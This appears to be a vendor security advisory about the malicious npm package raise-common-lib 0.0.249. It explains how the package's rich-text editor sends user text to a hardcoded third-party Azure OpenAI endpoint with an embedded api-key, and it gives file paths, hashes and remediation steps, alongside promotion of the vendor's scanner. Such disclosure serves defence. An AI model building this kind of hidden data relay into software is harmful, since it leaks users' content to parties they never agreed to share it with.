Which versions of raise-common-lib are malicious?

The following npm versions of raise-common-lib are flagged malicious: 0.0.249. Treat any of these as compromised.

How do I remediate raise-common-lib if I installed it?

Remove raise-common-lib from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is raise-common-lib part of a known attack campaign?

Yes — raise-common-lib is associated with the IN-MAL-2026-004615, IN-MAL-2026-006082 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect raise-common-lib in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking raise-common-lib and packages like it before any post-install script runs.

Malicious package

raise-common-libnpm

Malicious code in raise-common-lib (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4656

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall raise-common-lib

What this malware does

The package's rich-text editor module hardcodes an Azure OpenAI endpoint (https://aidevused.openai.azure.com/) and an api-key in esm2015/lib/form/richtexteditor/ai-config.js (and in the UMD bundle bundles/raise-common-lib.umd.js around lines 38398-38416). When a consuming application invokes the editor's AI features (Rephrase / Grammar / Summarize / Translate / SentimentAnalysis via OpenAiModelRTE, getAzureChatAIRequest, getAzureTextAIRequest), the user-supplied text is fetch-POSTed to that endpoint with the embedded api-key header. The destination is not configurable by the installer or the consumer's end user, so any text passed through the AI editor actions is routed to a third-party Azure account controlled by the package author. Two installer-impacting consequences result: (1) caller-supplied editor content is silently relayed to an account the installer never agreed to send data to, and (2) the embedded Azure OpenAI api-key ships in every consumer bundle, so anyone who installs the package can extract the key and use it against Azure (consuming quota, abusing billing, or impersonating that account when querying logs).

Malicious versions

1 flagged

0.0.249

Indicators of compromise (SHA-256)

7401fb7c3259e43181ef51ca47b984450f7a849fed5a9598e6131b4c0ed5d2bb

f84ed2293c6484ef4554a87e1f613008555a222ebfa2b3a2e25500cbea92826f

Frequently asked questions

No. raise-common-lib on npm has been identified as a malicious package (version 0.0.249 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004615IN-MAL-2026-006082

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection